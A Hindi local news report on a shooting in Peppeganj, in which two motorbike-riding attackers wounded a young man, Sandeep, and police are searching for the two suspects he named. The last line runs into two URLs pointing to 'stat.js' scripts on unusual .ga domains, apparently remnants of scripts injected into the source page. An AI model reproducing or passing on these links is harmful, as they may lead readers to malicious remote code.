मंगलवार की शाम पीपीगंज मे बदमाशों द्वारा एक युवक पर ताबरतोड़ फायरिंग कर दिया जब युवक घर के बाहर टहल रहा था। फायरिंग में युवक को सर, सीना, हाथ और प्राइवेट पार्ट में गोली लगने से घायल युवक को परिजनों द्वारा मेडिकल कॉलेज ले जाया गया। पुलिस की पूछताछ में युवक ने दो हमलावरों का नाम बताया है। जिसमें से एक आरोपीत के भाई को पुलिस हिरासत में लेकर पूछताछ कर रही है।
दीपचंद्र अग्रहरी वार्ड नंबर 11 के निवासी हैं। उनका बेटा संदीप जो मंगलवार की शाम करीब 6:30 बजे टहलते हुए फोन पर बात कर रहा था। कितु राजा पब्लिक स्कूल के सामने पीपीगंज कस्बे की तरफ से आए बाइक सवार 2 बदमाशों ने संदीप को रोक लिया। बदमाशों से कहासुनी के बाद हाथापाई शुरू हो गई और इसी दौरान एक ने पिस्टल से उस पर फायरिंग शुरू कर दी।
गोली की आवाज सुनकर आसपास के लोग दौड़े लेकिन बाइक सवार बदमाश पीपीगंज कस्बे की तरफ फरार हो गए। वही हड़बड़ी में उनका पिस्टल मौके पर ही छूट गया। खून से लथपथ संदीप को परिवार वालों ने निजी अस्पताल ले गए जहां प्राथमिक उपचार के बाद मेडिकल कॉलेज भेज दिया गया। स्थिति गंभीर होने पर मेडिकल कॉलेज के डॉक्टरों ने केजीएमयू भेज दिया।
एसएसपी योगेंद्र कुमार ने बताया कि संदीप ने जिन दो बदमाशों के नाम बताए हैं। उनकी तलाश पुलिस द्वारा की जा रही है और घटना से जुड़े जानकारी भी जुटाई जा रही है। और जल्दी दोनों बदमाशों को हिरासत में ले लिया जाएगाhttps://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms